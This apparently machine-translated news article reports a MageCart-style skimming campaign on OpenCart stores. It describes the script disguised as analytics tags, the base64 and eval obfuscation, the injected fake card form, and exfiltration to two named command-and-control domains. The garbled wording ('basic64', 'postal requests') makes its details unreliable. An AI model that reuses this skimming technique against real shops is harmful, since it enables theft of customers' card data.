- OpenCart websites have been injected in silence with malicious software that imitates confidence monitoring scripts
- The script is hidden in the analysis tags and quietly exchange real payment forms for false
- Dark JavaScript
A new MageCart style attack has raised concerns in the cybersecurity landscape, targeting the electronic commerce websites that are based on the OpenCart CMS.
The attackers injected malicious javascript into destination pages, intelligently hiding their payload among the legitimate analysis and marketing tags such as Facebook Pixel, Meta Pixel and Google Tag Manager.
Expreers of C / Side, a cybersecurity company that monitors scripts and third -party web assets to detect and prevent attack on the customer, says that the injected code looks like a standard tag extract, but its behavior tells another story.
Running techniques and script injection
This particular campaign disguises its malicious intention by coding for the URL of the payload using basic64 and routing traffic through suspicious areas such as /tagstart.shop/cdn/analytics.min.js, which makes detection in transit more difficult.
At first, it seems that it is a standard Google Analytics or Tag Manager script, but a more in -depth inspection reveals the opposite.
When decoded and executed, the script dynamically creates a new element, the insert before existing scripts and silently launches the additional code.
The malware then performs a strongly obscured code, using techniques such as hexadecimal references, the recombination of the table and the Eval () function for dynamic decoding.
The key function of this script is to inject a false credit card form when departure, designed to appear legitimate.
Once rendered, the form captures comments on the credit card number, expiration date and CVC. Auditors are attached to blurred, keys and stick events, ensuring that user entry is captured at each stage.
Above all, the attack was not based on the scratching of the clipboard and users are forced to manually enter the details of the card.
After that, the data is immediately exfiltrated via postal requests to two command and control areas (C2): // UltraCart[.]Boutique /G.PHP and //hxjet.pics/g.php.
In an additional key, the original payment form is masked once the card information submitted – a second page invites users to enter other bank transaction details, aggravating the threat.
What stands out in this case is the unusually long delay in the use of stolen card data, which took several months instead of the few typical days.
The report reveals that a card was used on June 18 in a transaction paying by phone in the United States, while another was billed € 47.80 to an unidentified seller.
This violation shows an increasing risk in electronic commerce based on the SaaS, where CMS platforms and Opencart become soft targets for advanced malware.
There is therefore a stronger need for safety measures beyond basic firewalls.
Automated platforms like C / Side claim to detect threats by identifying obscured JavaScript, unauthorized injections and abnormal script behavior.
As the attackers evolve, even small CMS deployments must remain vigilant, and surveillance in real time and the intelligence of threats should no longer be optional for electronic commerce providers who seek to guarantee the confidence of their customers.
